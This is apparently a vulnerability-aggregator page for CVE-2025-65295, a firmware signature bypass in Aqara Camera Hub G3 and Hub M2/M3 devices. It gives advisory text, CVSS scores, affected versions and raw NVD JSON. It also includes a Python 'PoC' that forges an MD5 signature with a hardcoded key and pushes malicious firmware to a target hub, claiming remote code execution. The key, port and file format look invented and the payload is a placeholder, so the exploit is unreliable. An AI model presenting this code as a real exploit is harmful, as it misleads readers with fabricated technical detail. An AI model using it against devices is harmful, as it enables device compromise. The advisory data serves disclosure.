Security Vulnerability Report
中文
CVE-2025-65295 CVSS 8.1 HIGH

CVE-2025-65295

Published: 2025-12-10 22:16:27
Last Modified: 2025-12-17 19:49:48
Source: [email protected]

Description

Multiple vulnerabilities in Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices, allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates, uses outdated cryptographic methods that can be exploited to forge valid signatures, and exposes information through improperly initialized memory.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:aqara:hub_m2_firmware:4.3.6_0027:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:hub_m2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:aqara:hub_m3_firmware:4.3.6_0025:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:hub_m3:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:aqara:camera_hub_g3_firmware:4.1.9_0027:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:camera_hub_g3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Aqara Camera Hub G3 < 4.1.9_0027
Aqara Hub M2 < 4.3.6_0027
Aqara Hub M3 < 4.3.6_0025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65295 PoC - Aqara Hub Malicious Firmware Injection # This PoC demonstrates the firmware signature bypass vulnerability import hashlib import struct import socket import time TARGET_IP = "192.168.1.100" # Target Aqara Hub IP TARGET_PORT = 8080 def generate_malicious_firmware(): """Generate malicious firmware with forged signature""" # Malicious firmware payload malicious_payload = b'\x00' * 1024 # Placeholder for actual malicious code # Create firmware header header = struct.pack('<I', 0x41515241) # 'AQRA' magic bytes header += struct.pack('<I', 0x00000001) # Version header += struct.pack('<I', len(malicious_payload)) # Payload length # Forge signature using weak cryptographic method weak_key = b'WEAK_AQARA_KEY_2024' signature = hashlib.md5(header + malicious_payload + weak_key).digest() return header + signature + malicious_payload def exploit(): """Send malicious firmware to target device""" print(f"[*] Targeting Aqara Hub: {TARGET_IP}") print(f"[*] Generating malicious firmware...") firmware = generate_malicious_firmware() print(f"[*] Sending malicious firmware ({len(firmware)} bytes)...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((TARGET_IP, TARGET_PORT)) sock.send(firmware) response = sock.recv(1024) if b'OK' in response or b'SUCCESS' in response: print("[+] Malicious firmware installed successfully!") print("[+] Device now compromised - remote code execution achieved") else: print("[-] Firmware installation failed or signature validation triggered") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit() # Note: This is a conceptual PoC for educational purposes only

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65295", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:27.140", "lastModified": "2025-12-17T19:49:47.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple vulnerabilities in Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices, allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates, uses outdated cryptographic methods that can be exploited to forge valid signatures, and exposes information through improperly initialized memory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-326"}, {"lang": "en", "value": "CWE-347"}, {"lang": "en", "value": "CWE-457"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:hub_m2_firmware:4.3.6_0027:*:*:*:*:*:*:*", "matchCriteriaId": "1DA5251B-FBDF-4020-B4AD-8735547D7BAB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:hub_m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "A94EB182-2F3B-42B2-935E-72936E6F8F33"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:hub_m3_firmware:4.3.6_0025:*:*:*:*:*:*:*", "matchCriteriaId": "4B9661B9-D471-4110-995C-04D9165DEA1F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:hub_m3:-:*:*:*:*:*:*:*", "matchCriteriaId": "8BC51964-8CAB-4849-A383-0D7D1CA68EE2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:camera_hub_g3_firmware:4.1.9_0027:*:*:*:*:*:*:*", "matchCriteriaId": "CF91CB18-CE99-4A86-A94C-7136288E8C33"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:camera_hub_g3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E823C290-E362-4BE0-9885-9A7B981134BC"}]}]}], "references": [{"url": "https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Firmware-Insecurity.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.